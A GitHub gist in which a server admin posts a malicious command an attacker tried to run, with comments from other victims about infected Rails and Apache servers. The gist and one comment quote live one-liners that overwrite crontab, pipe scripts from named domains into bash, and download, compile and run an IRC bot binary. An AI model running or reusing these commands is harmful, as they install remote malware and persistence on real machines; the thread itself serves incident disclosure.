Skip to content

Instantly share code, notes, and snippets.

@ismasan
Created May 25, 2013 04:55
Show Gist options
  • Star 10 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save ismasan/5647955 to your computer and use it in GitHub Desktop.
Save ismasan/5647955 to your computer and use it in GitHub Desktop.
Some asshole tried to access my servers and run this (they couldn't)
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
@conqueringlion93
Copy link

Hi,

an what about my configuration ??

Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :

  • k.c, k and ka files in /var/tmp (probably irc script)
  • an new line in my crontab executing some wget like this :

wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka‏

wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -

wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k‏

I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above).

I'm still searching how the malicious scripts were upload to my server ...

@Batistleman
Copy link

Hi,

my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?

@rogerthat
Copy link

my server was infected too, should I do a reinstall?

definetly

@Leglaw
Copy link

Leglaw commented May 29, 2013

@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.

@Netmisa
Copy link

Netmisa commented May 30, 2013

Ok, anyway we known now where the problem comes from.

@sorenwiz
Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment